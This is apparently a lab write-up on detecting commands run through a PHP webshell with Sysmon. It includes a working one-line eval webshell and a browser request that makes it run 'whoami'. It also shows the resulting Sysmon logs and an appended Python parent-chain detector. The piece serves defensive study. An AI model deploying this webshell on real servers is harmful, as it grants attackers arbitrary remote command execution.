Sysmon data collection and detection for interactive commands executed through a webshell backdoor
Download phpStudy from https://public.xp.cn/upgrades/phpStudy_64.zip and start WNMP as shown in the figure below.
Webshell content:
<?php echo "Your response is: ";?> <?php @eval($_GET['cmd']);?>
Write it to the file shell.php under C:\phpstudy_pro\WWW.
Execute the command from the browser:
localhost/shell.php?cmd=system(%27whoami%27);
Note the trailing ; at the end.
The page then returns:
Now look at the data Sysmon collected: there are 2 events.
One event is system() starting the cmd process:
Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:16.986
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ProcessId: 5512
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe /c "whoami"
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentProcessId: 3952
ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe
ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe
ParentUser: DESKTOP-92JS9SJ\bonel
The other event is cmd starting whoami:
Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:17.010
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
ProcessId: 4368
Image: C:\Windows\System32\whoami.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentProcessId: 5512
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe /c "whoami"
ParentUser: DESKTOP-92JS9SJ\bonel
Therefore, detection in the EDR should check the parent (and the parent's parent) process of whoami, that is, the process chain the two events above link together through ProcessGuid and ParentProcessGuid.
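The parent-chain check described above, as an added example that is not part of the original post: it parses Sysmon Event ID 1 text in the one-field-per-line form shown above, links records by ProcessGuid/ParentProcessGuid, and alerts when a shell or recon binary has a web-server process as an ancestor. The two sample records are trimmed copies of the post's events; the web-server and suspicious-child image lists are assumptions to adapt to your own stack.

```python
import re
# Constructed Sysmon Event ID 1 records, one field per line, trimmed to the fields the
# detection needs; they mirror the post's chain php-cgi.exe -> cmd.exe -> whoami.exe.
EVENTS = r"""
Process Create:
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
Image: C:\Windows\System32\cmd.exe
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe
Process Create:
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
Image: C:\Windows\System32\whoami.exe
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentImage: C:\Windows\System32\cmd.exe
"""
# Assumed image-name lists; tune them to the web servers and shells in your environment.
WEB_SERVER_IMAGES = {"php-cgi.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "whoami.exe", "net.exe", "ipconfig.exe"}

def parse_events(text):
    """One dict per record; a record starts at the 'Process Create:' line."""
    events = []
    for line in map(str.strip, text.splitlines()):
        if line == "Process Create:":
            events.append({})
        elif events and ": " in line:
            key, value = line.split(": ", 1)  # paths contain ':' but never ': '
            events[-1][key] = value
    return events

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_webshell_chains(events, max_depth=3):
    """Walk ParentProcessGuid links (stable, unlike reused PIDs); report chains ending in a web server."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["Image"]) not in SUSPICIOUS_CHILDREN:
            continue
        chain, node = [basename(e["Image"])], e
        for _ in range(max_depth):
            parent = basename(node.get("ParentImage", ""))
            chain.append(parent)
            if parent in WEB_SERVER_IMAGES:
                hits.append(" <- ".join(chain))
                break
            node = by_guid.get(node.get("ParentProcessGuid"))
            if node is None:  # the parent's own creation event was not collected
                break
    return hits
```

Running `find_webshell_chains(parse_events(EVENTS))` yields both `cmd.exe <- php-cgi.exe` and `whoami.exe <- cmd.exe <- php-cgi.exe`, while the same whoami.exe launched under explorer.exe produces no alert.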